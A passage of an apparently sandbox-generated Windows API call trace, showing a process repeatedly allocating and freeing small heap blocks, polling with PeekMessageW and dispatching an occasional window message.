hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.734] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.734] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.734] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.734] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.734] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.734] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.734] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.734] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.735] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.735] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.735] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.735] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.735] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.735] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.735] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.735] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.735] Sleep (dwMilliseconds=0x0) [0268.736] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.736] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.736] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.736] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0268.737] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f90c) returned 0 [0268.737] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f90c) returned 0 [0268.737] TranslateMessage (lpMsg=0x75f90c) returned 0 [0268.737] DispatchMessageW (lpMsg=0x75f90c) returned 0x0 [0268.737] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.737] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.737] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.737] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.737] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.737] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.737] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.737] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.737] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.737] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.737] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.737] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.737] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.737] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.737] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.737] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.737] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.737] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.737] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.737] Sleep (dwMilliseconds=0x0) [0268.738] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.738] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.738] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.738] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.738] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.738] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.738] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.738] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.738] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.738] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.738] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.738] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.738] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.738] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.738] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.738] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.738] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.738] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.738] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.738] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.738] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.738] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.738] Sleep (dwMilliseconds=0x0) [0268.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.739] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.739] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.739] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.739] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.739] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.739] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.739] Sleep (dwMilliseconds=0x0) [0268.740] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.740] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.740] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.740] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.740] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.740] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.740] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.740] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.740] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.740] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.740] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.740] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.740] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.740] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.740] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.740] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.740] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.740] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.740] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.740] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.740] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.740] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.740] Sleep (dwMilliseconds=0x0) [0268.740] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.741] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.741] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.741] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.741] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.741] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.741] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.741] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.741] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.741] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.741] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.741] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.741] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.741] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.741] Sleep (dwMilliseconds=0x0) [0268.741] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.741] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.741] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.742] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.742] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.742] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.742] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.742] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.742] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.742] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.742] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.742] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.742] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.742] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.742] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.742] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.742] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.742] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.742] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.742] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.742] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.742] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.742] Sleep (dwMilliseconds=0x0) [0268.742] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.742] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.742] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.742] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.743] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.743] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.743] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.743] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.743] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.743] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.743] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.743] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.743] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.743] Sleep (dwMilliseconds=0x0) [0268.743] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.743] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.743] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.743] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.743] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.744] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.744] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.744] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.744] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.744] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.744] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.744] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.744] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.744] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.744] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.744] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.744] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.744] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.744] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.744] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.744] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.744] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.744] Sleep (dwMilliseconds=0x0) [0268.744] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.744] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.744] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.744] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.744] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.745] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.745] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.745] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.745] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.745] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.745] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.745] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.745] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.745] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.745] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.745] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.745] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.745] HeapFree (in: 